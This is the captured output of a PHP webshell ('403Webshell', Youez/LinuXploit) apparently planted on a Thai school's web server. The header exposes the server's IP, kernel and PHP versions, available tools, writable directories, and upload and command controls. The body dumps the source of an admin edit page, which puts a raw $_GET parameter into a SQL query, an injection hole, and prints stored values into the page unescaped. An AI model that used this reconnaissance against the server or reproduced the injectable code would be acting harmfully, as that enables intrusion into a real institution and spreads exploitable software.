403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/Secure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/Secure//edit.php
<?
require_once "../config/confiteacher.inc.php";
require_once "../config/connectdb.php";
require_once "Secure.php";
$th=mktime(gmdate("H")+7,gmdate("i"),gmdate("m"),gmdate("d"),gmdate("Y"));
$format="H:i a";
$str=date($format,$th);
?>
<html>
<head>
<title>-:- ADMIN -:-</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<?php
						  
							
							$idu  =$objResult["teachcode"];
							

						?>
<body bgcolor="#5A697E"  onLoad="javascript:document.getElementById('useradmin').focus();">
<table width="75%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
    <td bgcolor="#003399">
<div align="center"><font color="#FFFFFF" size="+1"><strong>ฝ่ายบริหารงานวิชาการ<font color="#FFFF00">โรงเรียนกันทรลักษ์วิทยา</font></strong></font></div></td>
  </tr>
  <tr> 
    <td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="1" cellpadding="1">
        <tr> 
          <td><div align="right"><font color="#ff0000" size="2"><font color="#333333">ยินดีต้อนรับ 
              :</font> <font color="#ff0000"><?=$objResult["name"];?> <?=$objResult["surname"];?>
              <font color="#666666">เข้าสู่ระบบค่ะ </font></font></font></div></td>
        </tr>
        <tr> 
          <td><div align="right"><font color="#666666" size="2"><a href="user_page.php">หน้าหลักระบบ</a> 
              | <a href="logout.php">ออกจากระบบ</a></font></div></td>
        </tr>
        <tr> 
          <td><div align="center">
              <table width="773" border="0" align="center" cellpadding="0" cellspacing="0">
               
              </table>
              <table width="76%" border="0" align="center" cellpadding="1" cellspacing="1">
                <tr> 
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td><div align="center"> 
                      <script language="JavaScript">
function checkpost()
{
      var v1 = document.webForm.name.value;
var v2 = document.webForm.surname.value;
var v3 = document.webForm.room.value;

if( v1.length==0)
           {
           alert("กรุณาใส่ชื่อคุณด้วยค่ะ");
           document.webForm.name.focus();           
           return false;
           }
else  if( v2.length==0)
           {
           alert("กรุณาใส่ นามสกุล คุณด้วยค่ะ");
           document.webForm.surname.focus();           
           return false;
           }
else  if( v3.length==0)
           {
           alert("กรุณาใส่ ห้อง คุณด้วยค่ะ");
           document.webForm.room.focus();           
           return false;
           }
         else
           return true;
}
</script>
                      <font size="+1"><strong><font color="#003366" size="2">
                      <?php
							$sql_1="select * from pkklw join klw on klw.Username=pkklw.idspk where idspk = '$_GET[id]'";
							$db_query=mysql_db_query($db,$sql_1);
							$result1=mysql_fetch_array($db_query);
							$idmember  =$result1['idpk'];
							
							$idspk =$result1['idspk'];
							$name =$result1['Name'];
							$surname =$result1['surname'];
							$teachpk =$result1['teachpk'];
							$bpk =$result1['bpk'];
							$timepk =$result1['timepk'];
							$pstatus =$result1['pstatus'];
							$becos =$result1['becos'];
							$idpeple =$result1['idpeple'];
							$peplerecive =$result1['peplerecive'];

							
							
							



							$crsql="SELECT tpy FROM `pkklwtyp` where idtpy ='$bpk'";
							$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
							$dcrd = mysql_fetch_array($slr);
							$sahead=$dcrd[0];
							

						?>
                      </font></strong></font> </div>
                    <table width="100%" border="0" align="center" cellpadding="1" cellspacing="1">
                      <form method="post" action="editsavedata.php"  name="webForm" onSubmit="return checkpost()">
                        
						
						<tr> 
                          <td width="300"><div align="right"><font color="#333333" size="2">ชื่อ 
                              :</font></div></td>
                          <td width="355"><font size="3"> 
                            <? echo $name; ?> <? echo $surname; ?>
                            <input type="hidden" name="idmember" value=<? echo "$idmember"; ?>>
                            </font></td>
                             :</font></div></td>
                          <td><font size="3">
                            
                            </font></td>
						</tr>
					
				
						<tr> 
                          <td><div align="right"><font color="#333333" size="2">เหตุผล
                              :</font></div></td>
                          <td><font size="3">
                            <? echo $bpk; ?> <? echo $sahead; ?>
                            </font></td>
                        </tr>
						<tr> 
                          <td><div align="right"><font color="#333333" size="2">ครูผู้อนุญาต
                              :</font></div></td>
                          <td><font size="3">
                           <? echo $teachpk; ?>
                            </font></td>
                        </tr>
                        <tr> 
                          <td><div align="right"><font color="#333333" size="2">เหตุผลอื่นๆ
                              :</font></div></td>
                          <td><font size="3">
                            <input name=becos id=becos type=text class="input" size=35 value='<? echo $becos; ?>'>
                            </font></td>
                        </tr>
						<tr> 
                          <td><div align="right"><font color="#333333" size="2">เวลามารับ
                              :</font></div></td>
                          <td><font size="3">
                             <input name=timego id=timego type=text class="input" size=20 value='<? echo $str; ?>'>
                            </font></td>
                        </tr>
						<tr> 
                          <td width="300"><div align="right"><font color="#333333" size="2">กรณี 
                              :</font></div></td>
                          <td><font size="3">
                            
  <input name="pstatus" type="radio" id="radio" value="1" <? if($pstatus=="1"){echo checked;}?> />
  <label for="radio">กลับ ร.ร.</label>
  <input name="pstatus" type="radio" id="radio" value="2" <? if($pstatus=="2"){echo checked;}?> />
  <label for="radio">ไม่กลับ</label>
  
 
  
                            </font></td>
                        </tr>
						<tr> 
                          <td><div align="right"><font color="#333333" size="2">ชื่อ-เบอร์โทร ผู้มารับ
                              :</font></div></td>
                          <td><font size="3">
                            <input name=peplerecive id=peplerecive type=text class="input" size=35 value='<? echo $peplerecive; ?>'>
                            </font></td>
                        </tr>
						<tr> 
                          <td><div align="right"><font color="#333333" size="2">เจ้าหน้าที่
                              :</font></div></td>
                          <td><font size="3">
                            <input name=idpeple id=idpeple type=text class="input" size=3 value='<? echo $idu; ?>'>
                            </font></td>
                        </tr>
                        <tr> 
                          <td>&nbsp;</td>
                          <td><font size="3">
                            <input name="submit" type="submit" class="submit" value="แก้ไขรายการ!">
                            </font></td>
                        </tr>
                      </form>
                    </table></td>
                </tr>
              </table>
            </div></td>
        </tr>
        <tr>
          <td>&nbsp;</td>
        </tr>
      </table></td>
  </tr>
  <tr>
    <td><div align="center"><? echo "<font size=2 color=#ffffff>$footerweb</font>"; ?></div></td>
  </tr>
</table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit